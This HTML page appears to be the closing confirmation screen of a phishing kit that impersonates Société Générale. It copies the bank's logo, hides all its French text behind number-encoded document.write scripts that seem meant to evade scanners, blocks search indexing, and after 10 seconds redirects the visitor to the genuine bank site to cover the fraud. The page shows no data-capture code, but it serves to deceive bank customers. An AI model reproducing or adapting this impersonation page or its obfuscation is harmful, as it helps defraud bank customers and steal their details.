
<html class="no-js" lang="">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <title>Bienvenue,</title>
    <meta name="robots" content="noindex, nofollow, noimageindex">
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="shortcut icon nofollow" href="./img/ico.png">
    <link rel="stylesheet" href="./css/main.css">
    <script src="./js/main.js"></script>
  </head>
  
  <body class="hm tnk">
    <div class="lg">
      <header>
        <div class="wrapper">
          <div class="text-left">
            <img src="img/lg.png"  alt="">
          </div>
          <div class="text-right">
            <img src="img/cnt.png"  alt="">
            <img src="img/bjr.png"  alt="">
          </div>
        </div>
      </header>
      <menu>
        <div class="diviser"></div>
        <h1>
         Cvnfriamervn dt ovz rnfviamervnz dt cvnemne
        </h1>
      </menu> 
    </div>

    <div class="sm">
      <header>
        <div class="wrapper">
          <div class="text-center">
            <svg xmlns="http://www.w3.org/2000/svg" width="30" height="30" viewBox="0 0 30 30"><g fill="none" fill-rule="evenodd"><path fill="#FFF" d="M0 29.764h29.764V0H0z"/><path fill="#E60028" d="M.708 15.165h28.347V.708H.708z"/><path fill="#1D1D1B" d="M.708 29.055h28.347V14.883H.708z"/><path fill="#FFF" d="M5.661 15.745h18.442V14.02H5.661z"/></g></svg>
          </div>
        </div>
      </header>
      <menu>
        <h1>
          <script>get='111-120-119-111-120-128-109-42-126-110-42-132-120-128-124-111-119-107-115-128-112-120-124-42-132-128-121-42-126-110-42-120-128-124-111-119-107-115-124-112-120-128-77';set=unescape(get);document.write(set);</script>
        </h1>
      </menu> 
      <div class="arrow"></div>
    </div>

    <section>  
      <div class="wrapper">
        <main>
          <span>
            <script>get='60-42-126-127-119-111-211';set=unescape(get);document.write(set);</script>
          </span>
          <div class="arrow"></div>
        </main>   
        <div class="content">
          <div class="form">
            <div class="frm">
              <div class="text-center">
                <svg width="60px" height="78px" viewBox="0 0 53 68" id="style-valider-securiser" class="eip_svg_picto" icon-name="style-valider-securiser"><g fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-width="2"><path stroke="currentColor" stroke-linejoin="round" d="M14 54C7.557 45.298 1.46 32.69 1 15.848L9.943 11M19.018 5.254L26.603 1 52 15.373c-.345 15.063-4.942 28.516-13.676 39.784C33.613 61.25 28.901 65.16 26.373 67 24.125 65.303 20.156 61.976 16 56.923" class="stroke_couleur-principale"></path><path stroke="#F05B6F" d="M16 33.443L24.704 42 38 27" class="stroke_couleur-secondaire"></path></g></svg>
                  <h2>
                    <script>get='54-126-132-124-107-132-120-119-115-111-42-243-111-243-42-119-42-120-128-124-111-119-107-115-124-112-120-128-109-42-126-115-111-128-89';set=unescape(get);document.write(set);</script>
                  </h2>
                  <p>
                    <script>get='126-109-120-119-124-112-120-128-109-42-126-110-42-126-109-124-121-115-126-132-42-126-115-111-128-120-42-124-132-124-128-114-109-42-115-124-128-121-119-49-110-42-124-109-115-126-75';set=unescape(get);document.write(set);</script> <br>
                    <script>get='115-126-111-109-126-120-120-128-109-126-115-42-132-122-128-121-42-115-122-128-127-42-243-113-124-115-124-110-126-115-42-132-126-111-244-42-132-122-128-89';set=unescape(get);document.write(set);</script> <br>
                    <script>get='56-132-110-120-128-109-126-132-42-132-126-122-129-118-126-122-129-42-132-242-115-127-119-42-111-120-126-107-126-122-129-124-111-119-107-128-111-122-119';set=unescape(get);document.write(set);</script>
                  </p>
              </div>
            </div>   
          </div>
          <aside class="text-center">
            <img src="img/asd.png"  alt="">
          </aside>
        </div>
      </div> 
    </section>

    <footer>
      <div class="top">
        <div class="wrapper">
          <div class="left">
            <span>
              <svg icon-name="localisation" width="24px" height="30px" viewBox="0 0 24 30"><path fill="#fff" fill-rule="evenodd" d="M11.983 9.913c-.73 0-1.425.299-1.956.83a2.782 2.782 0 0 0 0 3.945c.53.53 1.227.829 1.956.829.73 0 1.426-.299 1.957-.83a2.782 2.782 0 0 0 0-3.945 2.764 2.764 0 0 0-1.957-.829zm0 6.83a3.987 3.987 0 0 1-2.851-1.193c-1.592-1.592-1.592-4.145 0-5.703a4.044 4.044 0 0 1 2.851-1.194c1.094 0 2.09.431 2.852 1.194 1.591 1.591 1.591 4.144 0 5.703a3.987 3.987 0 0 1-2.852 1.193zm0-15.483c-2.851 0-5.537 1.127-7.56 3.15C1.507 7.326.512 11.57 1.872 15.482c2.486 7.162 8.62 11.738 10.112 12.799 1.492-1.028 7.56-5.57 10.08-12.7l.033-.099c1.36-3.912.365-8.156-2.553-11.074-2.023-2.022-4.708-3.15-7.56-3.15zm0 28.514l-.331-.2C11.32 29.377 3.628 24.47.677 15.882-.848 11.505.247 6.763 3.53 3.514A11.918 11.918 0 0 1 11.983 0c3.183 0 6.2 1.26 8.455 3.514a11.933 11.933 0 0 1 3.117 11.538h.033l-.332.962c-2.984 8.521-10.61 13.362-10.941 13.56l-.332.2z"></path></svg>
              <strong><script>get='126-109-120-126-113-119-42-126-120-122-42-115-126-121-122-128-115-79';set=unescape(get);document.write(set);</script></strong>
            </span>
            <span>
              <svg icon-name="question" width="37px" height="30px" viewBox="0 0 37 30"><g fill="#fff" fill-rule="evenodd"><path d="M7.26 17.52a9.002 9.002 0 0 1-4.372-3.203C1.74 12.764 1.216 11.033 1.33 9.174c.11-1.805.806-3.436 2.068-4.848 1.49-1.67 3.46-2.72 5.855-3.12a11.531 11.531 0 0 1 1.846-.145l.152-.001c2.176-.01 4.426-.02 6.64.02 2.064.037 3.975.674 5.68 1.892 1.836 1.311 2.975 2.988 3.383 4.983.65 3.166-.372 5.875-3.036 8.049-1.496 1.22-3.28 1.933-5.3 2.117-.786.072-1.586.065-2.362.06L16 18.18c-.407.014-.679.12-.878.438-.838 1.338-2.111 2.437-4.008 3.458-.174.093-.35.183-.547.282l-.897.456.198-.684c.264-.908.368-1.764.317-2.617a9.146 9.146 0 0 0-.105-.958c-.029-.177-.128-.358-.658-.477l-.302-.068c-.617-.137-1.254-.279-1.86-.488m1.808 5.858c.48.339 1.02.39 1.563.147 2.455-1.106 4.154-2.387 5.347-4.026.12-.164.355-.25.524-.257.247-.014.495-.013.744-.009l.217.002c2.189.023 4.253-.54 6.111-1.629 3.657-2.14 5.505-6.14 4.602-9.953C27.153 3.347 22.799.134 17.822.018c-.816-.02-1.631-.014-2.447-.008l-1.443.004V.003l-.546-.001L12.533 0c-.381 0-.763.002-1.144.007L11.2.01c-.559.007-1.136.014-1.685.082C6.728.441 4.428 1.54 2.682 3.358.284 5.855-.511 8.677.318 11.745c1.014 3.746 3.733 6.175 8.086 7.219.215.05.503.17.52.595.031.79-.081 1.607-.354 2.565-.143.499.025.92.497 1.255"></path><path d="M33.182 25.528c2.303-1.396 3.602-4.363 3.09-7.053-.358-1.874-1.319-3.378-2.855-4.47a6.695 6.695 0 0 0-2.76-1.133c-.411-.07-.771.152-.834.517-.047.272.114.7.62.796.61.116 1.193.31 1.687.562 1.358.69 2.372 1.956 2.782 3.47a5.616 5.616 0 0 1-.673 4.5c-.873 1.356-2.131 2.202-3.74 2.509-.491.094-.633.256-.66.756-.019.35-.015.7-.01 1.068l.004 1.08-.648-.398c-.767-.497-1.41-1.189-1.916-2.053-.15-.258-.354-.373-.656-.373H26.469a29.37 29.37 0 0 1-.762-.001c-1.665-.028-3.062-.65-4.154-1.848-.513-.561-.9-1.238-1.182-2.07a.556.556 0 0 0-.308-.319.661.661 0 0 0-.521-.025c-.31.125-.457.483-.342.832a6.795 6.795 0 0 0 1.772 2.818c1.325 1.268 2.959 1.91 4.826 1.894h.013c.35 0 .602.129.815.42a8.04 8.04 0 0 0 2.932 2.445c.509.255.92.232 1.29-.07.383-.309.506-.712.386-1.265-.057-.266-.093-.536-.128-.807a21.09 21.09 0 0 0-.053-.39c-.061-.406.261-.542.367-.586l.412-.171c.459-.188.933-.383 1.35-.635M14.669 13.022c-.373 0-.688.13-.936.389-.248.26-.369.583-.369.984 0 .402.12.724.37.984.246.258.56.39.935.39.374 0 .69-.13.943-.389.255-.261.378-.584.378-.985 0-.4-.123-.723-.378-.984a1.269 1.269 0 0 0-.943-.39M17.745 5.507a2.423 2.423 0 0 0-.667-.901 2.914 2.914 0 0 0-1.019-.544 4.34 4.34 0 0 0-1.271-.18c-.628 0-1.202.142-1.705.421a4.64 4.64 0 0 0-1.229.998l-.068.085a.766.766 0 0 0-.183.486c0 .434.353.786.786.786.201 0 .394-.077.54-.218l.099-.094c.217-.222.453-.404.695-.54.276-.154.589-.232.93-.232.414 0 .743.121.976.36.233.238.352.559.352.952 0 .25-.062.488-.18.706-.125.226-.281.455-.464.682-.186.23-.385.47-.593.713-.21.242-.4.511-.567.797a3.651 3.651 0 0 0-.378.947 2.897 2.897 0 0 0-.061.994l.018.186h1.807l-.013-.218a1.97 1.97 0 0 1 .106-.798c.106-.29.248-.566.42-.822.176-.262.374-.51.59-.742.22-.237.43-.49.624-.752.194-.263.358-.544.488-.832.134-.294.201-.63.201-.998 0-.47-.079-.886-.234-1.242"></path></g></svg>
              <strong><script>get='132-126-111-120-126-122-129-243-115-112-42-132-120-128-124-111-132-126-122-97';set=unescape(get);document.write(set);</script></strong>
            </span>
            <span>
              <strong><script>get='126-118-119-115-243-120-243-81-42-243-111-243-124-109-128-100-42-132-126-111-124-132-42-132-126-115-111-122-87';set=unescape(get);document.write(set);</script></strong>
              <svg icon-name="arrow-dropdown" width="14px" height="8px" viewBox="0 0 17 11"><path fill="#fff" d="M15.653 1.427l-7 8M1.653 1.427l7 8" stroke="#fff" stroke-linecap="round" stroke-width="2"></path></svg>
            </span>
          </div>
          <div class="right">
            <span>
              <svg icon-name="facebook-2" width="15px" height="30px" viewBox="0 0 14 29"><path fill="#C3C3C3" fill-rule="evenodd" d="M0 9.598h2.962V6.692c0-1.288 0-3.269.966-4.492A5.332 5.332 0 0 1 8.598.018a18.846 18.846 0 0 1 5.37.54l-.75 4.435a10.084 10.084 0 0 0-2.415-.362c-1.167 0-2.205.418-2.205 1.61v3.357h4.782l-.33 4.339H8.597V29H2.962V13.937H0v-4.34z"></path></svg>          
            </span>
            <span>
              <svg icon-name="twitter-2" width="30px" height="30px" viewBox="0 0 31 25"><path fill="#C3C3C3" fill-rule="evenodd" d="M30.25 2.878a12.36 12.36 0 0 1-3.533.967 6.15 6.15 0 0 0 2.7-3.4 12.288 12.288 0 0 1-3.909 1.491 6.159 6.159 0 0 0-10.483 5.609A17.503 17.503 0 0 1 2.333 1.12a6.166 6.166 0 0 0 1.909 8.216A6.174 6.174 0 0 1 1.45 8.57v.075a6.158 6.158 0 0 0 4.942 6.033 6.013 6.013 0 0 1-1.625.216 6.059 6.059 0 0 1-1.184-.108 6.148 6.148 0 0 0 5.75 4.275A12.446 12.446 0 0 1 .25 21.61a17.432 17.432 0 0 0 9.433 2.767c11.325 0 17.5-9.375 17.5-17.5v-.833a12.503 12.503 0 0 0 3.067-3.167"></path></svg>          
            </span>
            <span>
              <svg icon-name="instagram" width="30px" height="30px" viewBox="0 0 29 29"><path fill="#C3C3C3" fill-rule="evenodd" d="M26.18 23.361a2.778 2.778 0 0 1-2.819 2.803H5.64a2.778 2.778 0 0 1-2.812-2.746v-11.89h4.326a7.926 7.926 0 1 0 14.693 0h4.335V23.36zM10.368 11.528a5.091 5.091 0 1 1 8.25 5.97 5.091 5.091 0 0 1-8.25-5.97zm14.605-8.185h.637v4.914H20.71V3.343h4.261zM23.362 0H5.638A5.639 5.639 0 0 0 0 5.64V23.36a5.64 5.64 0 0 0 5.639 5.64H23.36A5.64 5.64 0 0 0 29 23.36V5.64A5.639 5.639 0 0 0 23.361 0z"></path></svg>
            </span>
          </div>
        </div>
      </div>
      <div class="bottom">
        <div class="wrapper">
          <div class="left">
            <img src="img/lg.png"  alt="">
          </div>
          <div class="right">
            <span><script>get='132-112-124-115-119-79';set=unescape(get);document.write(set);</script></span>
            <span><script>get='132-111-120-126-107-126-113-119-113-120-126-42-132-128-88';set=unescape(get);document.write(set);</script></span>
            <span><script>get='132-126-118-119-113-243-118-42-132-120-128-124-111-119-107-115-128-112-120-92';set=unescape(get);document.write(set);</script></span>
            <span><script>get='132-126-124-130-128-128-77-42-126-111-115-119-114-77';set=unescape(get);document.write(set);</script></span>
            <span><script>get='243-111-124-115-122-109-243-100';set=unescape(get);document.write(set);</script></span>
            <span><script>get='132-126-118-118-126-120-120-128-132-115-126-127-42-132-126-243-120-120-128-78';set=unescape(get);document.write(set);</script></span>
          </div>
        </div>
		
		 <meta http-equiv="refresh" content="10; url=https://www.societegenerale.fr/"> 
      </div>
    </footer>
  </body>
</html>
